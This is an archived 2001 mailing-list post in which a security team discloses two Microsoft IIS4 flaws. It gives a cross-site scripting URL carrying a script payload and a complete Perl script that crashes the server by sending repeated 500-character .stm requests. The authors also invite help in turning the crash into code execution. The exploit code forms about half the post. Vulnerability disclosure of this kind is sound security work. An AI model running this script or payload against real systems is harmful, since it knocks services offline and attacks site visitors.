|
Vulnerability Development
mailing list archives
New D.O.S on IIS4 & a new cross site scripting vuln
From: "Admin [iSecureLabs]" <admin () ISECURELABS COM>
Date: Thu, 29 Mar 2001 16:55:08 +0200
--[ iSecureLabs.com French Security Team ]--
We have found 2 vulnerability on Microsoft IIS4
- Cross Site Scripting
- D.O.S
--[ The first one:
It is a cross site scripting, using this crafted url
http://server.com/foo/<script>alert('test')</script>.stm
it will execute the JavaScript code on your computer.
--[ The seconde one:
By requesting several times a .stm file 500 char long
(http://server.com/foo/[a x 500].stm) the IIS4 server crash.
Perhaps it is possible to use this vulnerability to execute arbitrary code.
We are currently working on a way to exploit this vulnerability.
If someone wants to help us, it is ok ;-)
Here is the exploit for the D.O.S one:
---<cut>---
#!/usr/bin/perl
# IIS4 .STM D.O.S by aurelien.cabezon () iSecureLabs com -
http://www.iSecureLabs.com
use IO::Socket;
if (@ARGV <2){print "Usage: ./stm.pl <host> <port>\n"; exit;}
$overflow = "a" x 500;
sub connect()
{
$Socket= IO::Socket::INET->new(Proto=>"TCP",
PeerAddr=>$ARGV[0],
PeerPort=>"$ARGV[1]",)
or die "Connection impossible a $ARGV[0] : f$!\n";
$Socket -> autoflush(1);
print $Socket "GET /foo/$overflow.stm HTTP/1.0\n\n";
print " \n\n> GET $ARGV[0]/foo/$overflow.stm HTTP/1.0\n\n";
print " > Server response:\n\n";
while(<$Socket>){
chomp ($reponse = <$Socket>);
print "$reponse\n";
}
print "\n> Data Sent. Server crashed.\n";
close $Socket;
}
&connect;
---<cut>---
Cabezon Aurélien
aurelien.cabezon () iSecureLabs com
http://www.iSecureLabs.com
 By Date 
By Thread
Current thread:
|
Intro
